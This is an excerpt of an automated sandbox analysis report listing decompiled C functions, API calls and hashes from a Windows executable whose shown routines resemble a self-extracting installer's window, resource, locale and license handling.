                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 571164536-0
                                                                                                                                                                                                                                              • Opcode ID: 6a57ab36144564d0ff84dec836103a42c863544f1b4826c5b9ac5b5ff258cdfd
                                                                                                                                                                                                                                              • Instruction ID: 964ec7074d9650196d04e80d44809526610a830a62ce77fa4a115a9267cfdef2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a57ab36144564d0ff84dec836103a42c863544f1b4826c5b9ac5b5ff258cdfd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C241183651C2855FEB159F348C54AFD7BAD9F97300F14809AE8CE87202DB358E86DB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E009743D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				struct tagRECT _v24;
                                                                                                                                                                                                                                              				struct tagRECT _v40;
                                                                                                                                                                                                                                              				struct HWND__* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				int _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				int _v60;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				struct HWND__* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t67;
                                                                                                                                                                                                                                              				struct HWND__* _t68;
                                                                                                                                                                                                                                              				struct HDC__* _t69;
                                                                                                                                                                                                                                              				int _t72;
                                                                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t63 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                              				_t68 = __edx;
                                                                                                                                                                                                                                              				_v44 = __ecx;
                                                                                                                                                                                                                                              				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                              				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                              				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                              				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                              				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                              				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                              				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                              				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                              				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                              				_t56 = _v48;
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                              				_t67 = 0;
                                                                                                                                                                                                                                              				if(_t72 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v52;
                                                                                                                                                                                                                                              					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                              						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t72 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                              				if(_t59 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v60;
                                                                                                                                                                                                                                              					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                              						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t59 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                              			}
























                                                                                                                                                                                                                                              0x009743d0
                                                                                                                                                                                                                                              0x009743d8
                                                                                                                                                                                                                                              0x009743df
                                                                                                                                                                                                                                              0x009743e6
                                                                                                                                                                                                                                              0x009743ec
                                                                                                                                                                                                                                              0x009743f1
                                                                                                                                                                                                                                              0x00974400
                                                                                                                                                                                                                                              0x00974403
                                                                                                                                                                                                                                              0x0097440b
                                                                                                                                                                                                                                              0x00974420
                                                                                                                                                                                                                                              0x00974429
                                                                                                                                                                                                                                              0x00974437
                                                                                                                                                                                                                                              0x00974444
                                                                                                                                                                                                                                              0x00974447
                                                                                                                                                                                                                                              0x0097444d
                                                                                                                                                                                                                                              0x00974454
                                                                                                                                                                                                                                              0x0097445b
                                                                                                                                                                                                                                              0x00974460
                                                                                                                                                                                                                                              0x00974461
                                                                                                                                                                                                                                              0x00974467
                                                                                                                                                                                                                                              0x0097446f
                                                                                                                                                                                                                                              0x00974473
                                                                                                                                                                                                                                              0x00974473
                                                                                                                                                                                                                                              0x00974463
                                                                                                                                                                                                                                              0x00974463
                                                                                                                                                                                                                                              0x00974463
                                                                                                                                                                                                                                              0x0097447a
                                                                                                                                                                                                                                              0x00974481
                                                                                                                                                                                                                                              0x00974484
                                                                                                                                                                                                                                              0x0097448a
                                                                                                                                                                                                                                              0x00974492
                                                                                                                                                                                                                                              0x00974496
                                                                                                                                                                                                                                              0x00974496
                                                                                                                                                                                                                                              0x00974486
                                                                                                                                                                                                                                              0x00974486
                                                                                                                                                                                                                                              0x00974486
                                                                                                                                                                                                                                              0x009744b8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 009743F1
                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0097440B
                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00974423
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0097442E
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0097443A
                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00974447
                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 009744A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2212493051-0
                                                                                                                                                                                                                                              • Opcode ID: f7b874f191a3ce36cd1c1518d62ff3a29ef166ad6bb4ba1740f1fd0ba546bc94
                                                                                                                                                                                                                                              • Instruction ID: 9a7c55381486752b03b1db31b10c6bf662b969b558eb6e434a2b56195b8ea9f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7b874f191a3ce36cd1c1518d62ff3a29ef166ad6bb4ba1740f1fd0ba546bc94
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06317E32E04119AFCB14CFB8DD88DEEBBB9EB89310F154169F809F3250DA306C459B60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                                                              			E00976298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				struct HRSRC__* _t21;
                                                                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                              				_t46 = 0;
                                                                                                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                                                                                                              				_v36 = 0;
                                                                                                                                                                                                                                              				_t36 = 1;
                                                                                                                                                                                                                                              				E0097171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                                                                                                              						 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              						_t36 = _t46;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                              						_t44 = _t5;
                                                                                                                                                                                                                                              						_t40 = _t44;
                                                                                                                                                                                                                                              						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                              						_t47 = _t6;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t26 =  *_t40;
                                                                                                                                                                                                                                              							_t40 = _t40 + 1;
                                                                                                                                                                                                                                              						} while (_t26 != 0);
                                                                                                                                                                                                                                              						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                              						_t46 = _t51;
                                                                                                                                                                                                                                              						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                              						 *0x97a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                              						_t30 = _v32();
                                                                                                                                                                                                                                              						if(_t51 != _t51) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(_t45);
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							_t36 = 0;
                                                                                                                                                                                                                                              							FreeResource(??);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							FreeResource();
                                                                                                                                                                                                                                              							_v36 = _v36 + 1;
                                                                                                                                                                                                                                              							E0097171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                              							_t46 = 0;
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					return E00976CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              0x00976298
                                                                                                                                                                                                                                              0x009762a0
                                                                                                                                                                                                                                              0x009762a7
                                                                                                                                                                                                                                              0x009762ad
                                                                                                                                                                                                                                              0x009762af
                                                                                                                                                                                                                                              0x009762bb
                                                                                                                                                                                                                                              0x009762c3
                                                                                                                                                                                                                                              0x009762c4
                                                                                                                                                                                                                                              0x0097633b
                                                                                                                                                                                                                                              0x0097633b
                                                                                                                                                                                                                                              0x00976345
                                                                                                                                                                                                                                              0x0097634d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009762da
                                                                                                                                                                                                                                              0x009762de
                                                                                                                                                                                                                                              0x0097635f
                                                                                                                                                                                                                                              0x00976369
                                                                                                                                                                                                                                              0x009762e0
                                                                                                                                                                                                                                              0x009762e0
                                                                                                                                                                                                                                              0x009762e0
                                                                                                                                                                                                                                              0x009762e3
                                                                                                                                                                                                                                              0x009762e5
                                                                                                                                                                                                                                              0x009762e5
                                                                                                                                                                                                                                              0x009762e8
                                                                                                                                                                                                                                              0x009762e8
                                                                                                                                                                                                                                              0x009762ea
                                                                                                                                                                                                                                              0x009762eb
                                                                                                                                                                                                                                              0x009762ef
                                                                                                                                                                                                                                              0x009762f1
                                                                                                                                                                                                                                              0x009762f3
                                                                                                                                                                                                                                              0x00976302
                                                                                                                                                                                                                                              0x00976308
                                                                                                                                                                                                                                              0x0097630d
                                                                                                                                                                                                                                              0x00976314
                                                                                                                                                                                                                                              0x00976314
                                                                                                                                                                                                                                              0x00976316
                                                                                                                                                                                                                                              0x00976319
                                                                                                                                                                                                                                              0x00976355
                                                                                                                                                                                                                                              0x00976357
                                                                                                                                                                                                                                              0x0097631b
                                                                                                                                                                                                                                              0x0097631b
                                                                                                                                                                                                                                              0x00976331
                                                                                                                                                                                                                                              0x00976334
                                                                                                                                                                                                                                              0x00976339
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976339
                                                                                                                                                                                                                                              0x00976319
                                                                                                                                                                                                                                              0x0097636b
                                                                                                                                                                                                                                              0x0097637d
                                                                                                                                                                                                                                              0x0097637d
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097171E: _vsnprintf.MSVCRT ref: 00971750
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,009751CA,00000004,00000024,00972F71,?,00000002,00000000), ref: 009762CD
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,009751CA,00000004,00000024,00972F71,?,00000002,00000000), ref: 009762D4
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009751CA,00000004,00000024,00972F71,?,00000002,00000000), ref: 0097631B
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00976345
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009751CA,00000004,00000024,00972F71,?,00000002,00000000), ref: 00976357
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                              • String ID: UPDFILE%lu
                                                                                                                                                                                                                                              • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                              • Opcode ID: 7679dab00dfdb74d5d9b75e083f762bd15f169cc316cf925b651fff73b066f69
                                                                                                                                                                                                                                              • Instruction ID: e91c10bfb7e665ad5e54845e218ee219fac203e87e2ae68979d8641e6ebbf7d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7679dab00dfdb74d5d9b75e083f762bd15f169cc316cf925b651fff73b066f69
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79212633A04619ABDB149F64CC459FF7B7CFB84714B008119F90AA3241DB358D02DBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E0097681F(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                              				void* _v172;
                                                                                                                                                                                                                                              				int* _v176;
                                                                                                                                                                                                                                              				int _v180;
                                                                                                                                                                                                                                              				int _v184;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t36 = __ebx;
                                                                                                                                                                                                                                              				_t19 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                              				_t41 =  *0x9781d8; // 0x0
                                                                                                                                                                                                                                              				_t43 = 0;
                                                                                                                                                                                                                                              				_v180 = 0xc;
                                                                                                                                                                                                                                              				_v176 = 0;
                                                                                                                                                                                                                                              				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                              					 *0x9781d8 = 0;
                                                                                                                                                                                                                                              					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              						_t41 =  *0x9781d8; // 0x0
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t41 = 1;
                                                                                                                                                                                                                                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t31 = RegQueryValueExA(_v172, 0x971140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                              							_t43 = _t31;
                                                                                                                                                                                                                                              							RegCloseKey(_v172);
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t40 =  &_v176;
                                                                                                                                                                                                                                              								if(E009766F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                              									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                              										 *0x9781d8 = _t41;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L12;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x0097681f
                                                                                                                                                                                                                                              0x0097682a
                                                                                                                                                                                                                                              0x00976831
                                                                                                                                                                                                                                              0x00976836
                                                                                                                                                                                                                                              0x0097683c
                                                                                                                                                                                                                                              0x0097683e
                                                                                                                                                                                                                                              0x00976848
                                                                                                                                                                                                                                              0x00976851
                                                                                                                                                                                                                                              0x0097685d
                                                                                                                                                                                                                                              0x00976864
                                                                                                                                                                                                                                              0x00976876
                                                                                                                                                                                                                                              0x0097693a
                                                                                                                                                                                                                                              0x0097693a
                                                                                                                                                                                                                                              0x0097687c
                                                                                                                                                                                                                                              0x0097687e
                                                                                                                                                                                                                                              0x00976885
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009768d6
                                                                                                                                                                                                                                              0x009768f4
                                                                                                                                                                                                                                              0x00976900
                                                                                                                                                                                                                                              0x00976902
                                                                                                                                                                                                                                              0x0097690a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097690c
                                                                                                                                                                                                                                              0x0097690c
                                                                                                                                                                                                                                              0x0097691c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097691e
                                                                                                                                                                                                                                              0x00976924
                                                                                                                                                                                                                                              0x0097692b
                                                                                                                                                                                                                                              0x00976932
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097692b
                                                                                                                                                                                                                                              0x0097691c
                                                                                                                                                                                                                                              0x0097690a
                                                                                                                                                                                                                                              0x00976885
                                                                                                                                                                                                                                              0x00976876
                                                                                                                                                                                                                                              0x00976951

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0097686E
                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004A), ref: 009768A7
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009768CC
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00971140,00000000,?,?,0000000C), ref: 009768F4
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00976902
                                                                                                                                                                                                                                                • Part of subcall function 009766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0097691A), ref: 00976741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Control Panel\Desktop\ResourceLocale, xrefs: 009768C2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                              • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                              • Opcode ID: f4d7c00644e1365018f52894e88e573e9665e8df1a96d3d5ce0080c259be124a
                                                                                                                                                                                                                                              • Instruction ID: 581401e180ae9910fdb9b9f639082af1a61375af8b5ea0219a170bc3310e8457
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4d7c00644e1365018f52894e88e573e9665e8df1a96d3d5ce0080c259be124a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8318133A046189FDB21CB12CC04BABB77CFB85728F0081A9EA4DA6140DB309D85CF52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00973A3F(void* __eflags) {
                                                                                                                                                                                                                                              				void* _t3;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = "LICENSE";
                                                                                                                                                                                                                                              				_t1 = E0097468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				 *0x978d4c = _t3;
                                                                                                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                                                                                                              					_t19 = _t16;
                                                                                                                                                                                                                                              					if(E0097468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA( *0x978d4c, "<None>") == 0) {
                                                                                                                                                                                                                                              							LocalFree( *0x978d4c);
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0x979124 = 0;
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t9 = E00976517(_t19, 0x7d1, 0, E00973100, 0, 0);
                                                                                                                                                                                                                                              						LocalFree( *0x978d4c);
                                                                                                                                                                                                                                              						if(_t9 != 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x979124 = 0x800704c7;
                                                                                                                                                                                                                                              						L2:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree( *0x978d4c);
                                                                                                                                                                                                                                              					 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0x979124 = E00976285();
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              0x00973a46
                                                                                                                                                                                                                                              0x00973a57
                                                                                                                                                                                                                                              0x00973a5d
                                                                                                                                                                                                                                              0x00973a63
                                                                                                                                                                                                                                              0x00973a6a
                                                                                                                                                                                                                                              0x00973a91
                                                                                                                                                                                                                                              0x00973a9a
                                                                                                                                                                                                                                              0x00973ad8
                                                                                                                                                                                                                                              0x00973b13
                                                                                                                                                                                                                                              0x00973b19
                                                                                                                                                                                                                                              0x00973b1b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973b21
                                                                                                                                                                                                                                              0x00973ae7
                                                                                                                                                                                                                                              0x00973af4
                                                                                                                                                                                                                                              0x00973afc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973afe
                                                                                                                                                                                                                                              0x00973a87
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973a87
                                                                                                                                                                                                                                              0x00973aa8
                                                                                                                                                                                                                                              0x00973ab3
                                                                                                                                                                                                                                              0x00973ab9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973ab9
                                                                                                                                                                                                                                              0x00973a78
                                                                                                                                                                                                                                              0x00973a82
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
